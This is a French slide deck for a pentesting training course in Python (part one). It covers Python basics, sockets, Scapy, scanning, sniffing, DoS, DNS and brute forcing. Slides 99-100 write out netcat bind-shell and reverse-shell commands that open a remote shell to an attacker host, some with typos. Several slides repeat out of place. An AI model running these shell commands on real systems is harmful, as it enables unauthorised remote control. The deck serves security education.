Formation complète ici: https://www.alphorm.com/tutoriel/formation-en-ligne-python-pour-les-pentesteurs-1-2 Cette formation a pour objectif de permettre d’exploiter le langage Python dans une approche et vision de pentest et sécurité informatique. Nous verrons ensemble de nombreuses problématiques d'audits et les solutions à mettre en place pour automatiser les tâches et procédures pour les faciliter grâce au Scripting Python . Cette première partie est destiné à l’appréhension des notions de bases en Python et l’exploitation de la puissance de Python à la sécurité des réseaux informatiques.

1. Formation
Python pour
les Pentesteurs
Une formation
Hamza KONDAH

2. Une formation
Pourquoi Python ?
Implémentation
Python pour la sécurité
Plan de la formation
Public concerné
Prérequis
Plan

3. Une formation
Pourquoi Python ?
Open Source
Multi-Platform
Riche en Librairies
Outils open source
HLL Prototyping rapide

4. Une formation
Implémentation

5. Une formation
Python pour la sécurité
Librairies
Prototyping rapide (POC)
Outils disponibles
Communauté
Syntaxe

6. Une formation
Plan de la formation
Introduction
1. Notions de base en Python
2. La sécurité des réseaux
3. Le Web et Python
4. Développement d’exploits et Python
5. Analyse de malware et Python
6. Forensics en Python
Conclusion

7. Une formation
Public concerné
Responsables de la sécurité des SI
Auditeurs en sécurité

8. Une formation
Prérequis
Avoir des bases en sécurité des SI
Connaître le fonctionnement des réseaux
Comprendre le fonctionnement du
protocole HTTP
Avoir des bases théoriques en cryptographie

10. Préparation des éléments
du Lab
Une formation
Hamza KONDAH

11. Une formation
Introduction
Eléments du Lab
Lab : Mise en Place du Lab
Plan

12. Une formation
Introduction
Création en 1989
Python 2.x en 2000
Python 3.x en 2008
Pas de post-compatibilité
Focalisation sur la version 2.7
Support généralisé pour la version 3.7

13. Une formation
Pourquoi Python ?
Open Source
Multi-Platform
Riche en Librairies
Outils open source
HLL Prototyping rapide

14. Une formation
Pourquoi Python ?
Open Source
Multi-Platform
Riche en Librairies
Outils open source
HLL Prototyping rapide

15. Merci

16. Comprendre les notions
de base de Python
Une formation
Hamza KONDAH

17. Une formation
Rappel rapide
VirtualEnv
Lab : Notions de bases
Plan

18. Une formation
Rappel rapide
Hello World
Script
Console
Basculement entre versions
VirtualEnv

19. Une formation
VirtualEnv
Cumule de plusieurs projets
Problème de compatibilité
Mises à jour et Versions
Environnement virtuel
Isolation vis-à-vis de l’Os

20. Une formation
VirtualEnv

21. Une formation
Lab : Notions de base

22. Merci

23. Maîtriser l'essentiel
du Python
Une formation
Hamza KONDAH

24. Une formation
Objets et références
Types de données
L’Unicode
Méthodes String
Formatage de String
Les Nombres
Plan

25. Une formation
Objets et Références
Variable ObjetRéférence

26. Une formation
Implémentation

27. Une formation
L’Unicode
Internationalisation
Variable = ‘’ Alphorm ‘’
Conversion
Str (Variable)
Unicode
(Variable)

28. Une formation
Méthodes String
String.find () String.Replace () String.Split ()
String.digits () String.Lowercase ()

29. Une formation
Formatage de String

30. Une formation
Les Nombres
Gestion traditionnelle
Opérateurs
*,**,-,+,/ &,^,| and, not, or, xor

31. Une formation
Les Nombres

32. Merci

33. Structures de données en
Python
Une formation
Hamza KONDAH

34. Une formation
Les listes
Les tuples
Les ensembles
Les dictionnaires
Plan

35. Une formation
Les listes

36. Une formation
Les Tuples
Informations = (‘’Hello‘’,10,R,0)

37. Une formation
Les ensembles
A
A∩B
B
A∩B∩C
(A∩C) /B (B∩C )/A
C

38. Une formation
Les Dictionnaires
‘a’
‘c’
‘g’
‘hamza’
‘hack’
‘gamma’
-Clé- -Valeur-
dictionnaire

39. Merci

40. Une formation
Python pour la sécurité
Librairies
Prototyping rapide (POC)
Outils disponibles
Communauté
Syntaxe

41. Une formation
Définition
Lab: Les Fonctions
Plan

42. Une formation
Définition
Section(s) du code
Groupage
Meilleure exploitation
Premier pas vers la modularité
def function name ( parameters )
function_instruction
return [expression]

43. Une formation
Lab : Les Fonctions

44. Merci

45. Les Classes et Objets
Une formation
Hamza KONDAH

46. Une formation
Introduction
L’Héritage
Lab : Classes et Objets
Plan

47. Une formation
Introduction
Def__init__
(self,inp1,inp2):
• Self.a=inp1
• Self.b=inp2
Def somme (self)
:
• Return self.a+self.b
Def multi(self):
• Return self.a*self.b
Class Calculatrice

48. Une formation
L’Héritage
Def power (self) :
• Return pow(self.a,self.b
Class CalculatriceScientifique(Calculatrice)

49. Une formation
Plan de la formation
Introduction
1. Notions de base en Python
2. La sécurité des réseaux
3. Le Web et Python
4. Développement d’exploits et Python
5. Analyse de malware et Python
6. Forensics en Python
Conclusion

50. Merci

51. La gestion des exceptions
Une formation
Hamza KONDAH

52. Une formation
Définition
Syntaxe
Lab : Gestion des exceptions
Plan

53. Une formation
Définition
Gestion élégante des exceptions
« Une exception est un mécanisme
d’interruption du programme utilisé
pour signaler que quelque chose
d’anormal est en train de se produire »

54. Une formation
Syntaxe
def votre_super_fonction(param):
if param not in (1, 2, 3):
raise ValueError("'param' can only be either 1, 2 or
3") # reste du code
>> votre_super_fonction(4)
Traceback (most recent call last): File "<ipython-input-3-
bcd6e8653c83>", line 1, in <module>
votre_super_fonction(4)
File "<ipython-input-2-46fc7cd18c42>", line 3, in
votre_super_fonction
raise ValueError("'param' can only be either 1, 2 or 3")
ValueError: 'param' can only be either 1, 2 or 3
try:
# lignes qui peuvent
# lever une exception
except NomException:
# faire un truc si l'exception se déclenche

55. Une formation
Lab : Gestion des exceptions

56. Merci

57. Modules et Packages
en Python
Une formation
Hamza KONDAH

58. Une formation
Public concerné
Responsables de la sécurité des SI
Auditeurs en sécurité

59. Une formation
Les modules en Python
Organisation de code
Classes, fonctions et variables
Importation de modules
Importation de fonctions

60. Une formation
Les packages en Python
Gestion hiérarchique
Fichiers et répertoires
Structure organisée du code
Modules et sous packages

61. Une formation
Lab : Modules et Packages

62. Merci

63. Gérer les processus en Python
Une formation
Hamza KONDAH

64. Une formation
Introduction
Gestion des exécutions
Lab : Gestion des processus
Plan

65. Une formation
Introduction
Bibliothèque standard
Programmation parallèle
Instruction de codes

66. Une formation
Gestion des exécutions
Création et gestion des files
Les threads reçoivent les instructions
Les threads exécutent les tâches
Tous les threads finissent une fois que
la file est vide

67. Une formation
Lab : Gestion des processus

68. Merci

69. Une formation
Prérequis
Avoir des bases en sécurité des SI
Connaître le fonctionnement des réseaux
Comprendre le fonctionnement du
protocole HTTP
Avoir des bases théoriques en cryptographie

70. Une formation
Introduction
Bases en sécurité des réseaux
Plan

71. Une formation
Introduction
Evolution des menaces
Complexité des situations
Nécessité de modeler ses propres
outils
Test d’intrusion
Langages complexes
Python La clé de voute ☺

72. Une formation
L’intégrité
S'assurer que l'information n'est pas
modifiée ou falsifiée par des parties
non autorisées
Utilisateur
Man in the middle
Serveur
X

73. Une formation
Disponibilité
S’assurer de la disponibilité
de l’information et services
Utilisateur
Serveur

74. Une formation
L’authentification
S'assurer que l'identité d'un
individu est vérifiée par le système
ou le service
Utilisateur non
autorisé
Serveur
Utilisateur autorisé

75. Une formation
Non-répudiation
S'assurer qu'une partie dans une
communication ne peut pas nier l'envoi
du message
Utilisateur autorisé Serveur
Transfert de fond : 500
L’utilisateur nie le transfert

76. Une formation
La confidentialité
S'assurer que l'information n'est
pas divulguée aux parties non
autorisées
Utilisateur
Man in the middle
Serveur
X

77. Merci

79. Une formation
DNS – Fonctionnement
Le protocole TCP
TCP : 3-Way handshake
UDP
IPv6
ICMP
ARP
Plan

80. Une formation
DNS - fonctionnement

81. Une formation
Le protocole TCP
Transmission Control Protocol
Orienté connexion
Fiable
Transport
Wireshark

82. Une formation
TCP : 3-way handshake
Le « three way handshake »
Hôte A
10.0.0.2:21
Hôte B
10.0.0.3 :21
Three-Way Handshake
SYN Received
Send SYN ACK
(Seq= 300 Ack= 101 Ctl= SYN , ack )
SYN Received
Etablished
(Seq = 101 Ack = 301 Ctl = ack )
TIMETIME

83. Une formation
UDP
User Datagram Protcol
Sans Connexion
Pas de contrôle d’erreurs
Transport très simple
TFTP SNMP DHCP

84. Une formation
IPv6
IPv6 ou IPng
Adressage plus large
Contrôle de données
Sécurité
QoS
Headers

85. Préparation des éléments
du Lab
Une formation
Hamza KONDAH

86. Une formation
ARP
Address Resolution Protocol
TCP/IP
Protocole de résolution de nom
Adresse physique
Correspondance

87. Merci

88. Comprendre les Sockets
Une formation
Hamza KONDAH

89. Une formation
Définition
Python et les Sockets
Fonctionnement
Lab : Les Sockets
Plan

90. Une formation
Définition
Interface ou connecteur réseau
Elément logiciel
Exploitation des services d’un
protocole réseau
Echange d’informations

91. Une formation
Définition

92. Une formation
Python et les Sockets

93. Une formation
Fonctionnement

94. Une formation
Lab : Les sockets

95. Merci

96. Créer une backdoor simple
en python
Une formation
Hamza KONDAH

97. Une formation
Introduction
Eléments du Lab
Lab : Mise en Place du Lab
Plan

98. Une formation
Définition
Backdoor
Logiciel malveillant
Format légitime
Prise de contrôle
Porte dérobée

99. Une formation
Bind Shell
$ nc vulnerable 6667
2 Attacker
$ nc -1 –p 6667 –e/bin/sh
1 Vulnerable
TCP connection to port 667

100. Une formation
Reverse Shell
$ nc –I –p 80
1 Attacker
$ nc attacker 80 –e/bin/sh
2 Vulnerable
TCP connection to port 80

101. Une formation
Lab : Les Backdoors

102. Merci

103. La programmation
avec Scapy
Une formation
Hamza KONDAH

104. Une formation
Introduction
Création de paquets
La Couche 2 et 3
Lab : Programmation avec Scapy
Plan

105. Une formation
Introduction
Création en 1989
Python 2.x en 2000
Python 3.x en 2008
Pas de post-compatibilité
Focalisation sur la version 2.7
Support généralisé pour la version 3.7

106. Une formation
Création de paquets

107. Une formation
La couche 2 et 3
Couche 3
Couche 2
sr() sr1()
srp() srp1()

108. Une formation
Lab : Programmation Scapy

109. Merci

110. Comprendre la théorie des
techniques de scanning
Une formation
Hamza KONDAH

111. Une formation
TCP Full Scan
Stealth Scan
XMAS Scan
ACK Flag Probe Scanning
Idle/IPD Scaning
UDP Scanning
Plan

112. Une formation
TCP SYN Scan

113. Une formation
TCP Full Scan
Ce scan permet de détecter un port ouvert en
effectuant un Three-way Handshake
Connexion avec la cible, arrêtée avec un paquet RST
Pas de privilèges

114. Une formation
Stealth Scan
Effectuer un reset de la connexion TCP
Exploiter cette technique afin de bypasser les règles
du firewall, mécanisme de logging, se cacher …
Processus :

115. Une formation
XMAS Scan
Envoi de trame TCP à une cible avec des flags
FIN,URG et PUSH
FIN Scan marche juste avec l’implémentation RFC 793
Ne marche pas sur les versions actuelles de Windows

116. Une formation
ACK Flag Probe Scanning
ACK Probe flag
Le système de filtrage
Pas de réponse Filtré
RST Port non filtré

117. Une formation
Idle/IPD Scanning
IPID Probe SYN+ACK PACKET
Response : IPID=31337Attacker Zombie
Attacker
Zombie Zombie
Attacker
Target
Target
SYN Packet to port 80 spoofing zombie IP adress
Port is open Port is closed
SYN Packet to port 80 spoofing zombie IP adress
IPID Probe SYN+ACK PACKET
Response : IPID=31339 RST Packet IPID Incremented by
2 Since Step 1 so port 80 must be openAttacker Zombie
Probe ‘ zombie’ IPID again
RST Packet

118. Une formation
UDP Scanning

119. Merci

120. Une formation
Eléments du Lab

121. Une formation
Introduction
Scapy
Lab : Scanning
Plan

122. Une formation
Introduction
Ensemble de procédures afin
d’identifier des hôtes, ports et
services dans un réseau
Base pyramidale
Manipulation approfondie
Firewalking

123. Une formation
Scapy
Libraire Python
Manipulation de paquets réseau
Interception, création, prise
d’empreinte, développement et
analyse
Décodage de paquets

124. Une formation
Lab : Scanning

125. Merci

126. Comprendre le Sniffing
Une formation
Hamza KONDAH

127. Une formation
Méthodologie
RAW Socket
Scapy
Lab : Le Sniffing
Plan

128. Une formation
Méthodologie

129. Une formation
RAW Socket
Manipulation des en-têtes des paquets
à la main
Programmation réseau
Couches TCP/IP
Développement de protocoles

130. Une formation
RAW Socket
Pas intéressant à utiliser
Implémentation lourde
Existence de plusieurs librairies tierces
Scapy
Puissance à l’état pure

131. Une formation
Scapy

132. Une formation
Lab : Le Sniffing

133. Merci

134. Les attaques par dénis de
service
Une formation
Hamza KONDAH

135. Une formation
Introduction
Dénis de service
Dénis de service distribué
Les types attaques DoS
Plan

136. Une formation
Lab : Mise en place du Lab

137. Une formation
Dénis de service

138. Une formation
Dénis de service Distribué

139. Une formation
Smurf attack

140. Une formation
SYN Flooding

141. Merci

142. Le Protocole DNS
Une formation
Hamza KONDAH

143. Une formation
Introduction
Enregistrements DNS
NSLOOKUP
Lab : Le protocole DNS
Plan

144. Une formation
Introduction
Domain Name Service
Translation d’adresse
@IP Domaine
Différents types d’enregistrements
DNSSEC

145. Une formation
Enregistrements DNS
A AAAA CNAME MX
PTR NS SOA SRV
NAPTR TXT

146. Une formation
NSLOOKUP

147. Une formation
Lab : Le protocole DNS

148. Merci

149. Merci

150. Une formation
Le Spoofing

151. Une formation
Les Attaques DoS

152. Une formation
MAC Flooding

153. Une formation
DHCP Starvation

154. Merci

155. Attaques sur
les réseaux sans fils
Une formation
Hamza KONDAH

156. Une formation
Introduction
Lab : Hacking WLAN
Plan

157. Une formation
Introduction
Analyse des réseaux sans fils
Sniffing
Fonctions de base
Scapy : Notre ami à jamais
Dénis de service

158. Comprendre les notions
de base de Python
Une formation
Hamza KONDAH

159. Comprendre les notions
de base de Python
Une formation
Hamza KONDAH

160. Comprendre les notions
de base de Python
Une formation
Hamza KONDAH

161. Analyser les fichiers PCAP
Une formation
Hamza KONDAH

162. Une formation
Les fichiers PCAP
Lab: Les fichiers PCAP
Plan

163. Une formation
Les fichiers PCAP
Packet Capture
Wireshark, TCP Dump…
Bibliothèque libcap
Analyse post-capture
Efficience
Python ☺

164. Une formation
Lab : Les fichiers PCAP

165. Merci

166. Comprendre le Bruteforcing
Une formation
Hamza KONDAH

167. Une formation
Introduction
Paramiko
Lab : Le bruteforcing
Plan

168. Une formation
Rappel rapide
VirtualEnv
Lab : Notions de bases
Plan

169. Une formation
Paramiko
Création de session SSH & SFTP
Rapide et efficace
Client SSH
Brute Forcing

170. Une formation
Lab : Le Bruteforcing

171. Merci

172. Le Fuzzing
Une formation
Hamza KONDAH

173. Une formation
Introduction
Lab : Le Fuzzing
Plan

174. Une formation
Introduction
Identification de vulnérabilités
Buffer Overflow
Web
Données aléatoires
Mémoire
Exécution de code

175. Une formation
Lab : Fuzzing

176. Merci

177. Une formation
Rappel rapide
Hello World
Script
Console
Basculement entre versions
VirtualEnv

178. Une formation
Bilan
Notions de base
Sécurité des réseaux

179. Une formation
Prochaine formation
Le web et python
Le développement d’exploits
Le forensique
La cryptographie

180. Une formation
A Faire
Faire les exercices au niveau des
ressources
Solutions disponibles
Lire ☺
Pratiquez !
Et attendre la deuxième partie

181. Une formation
Bibliographie

182. Une formation
Formations à suivre

183. Merci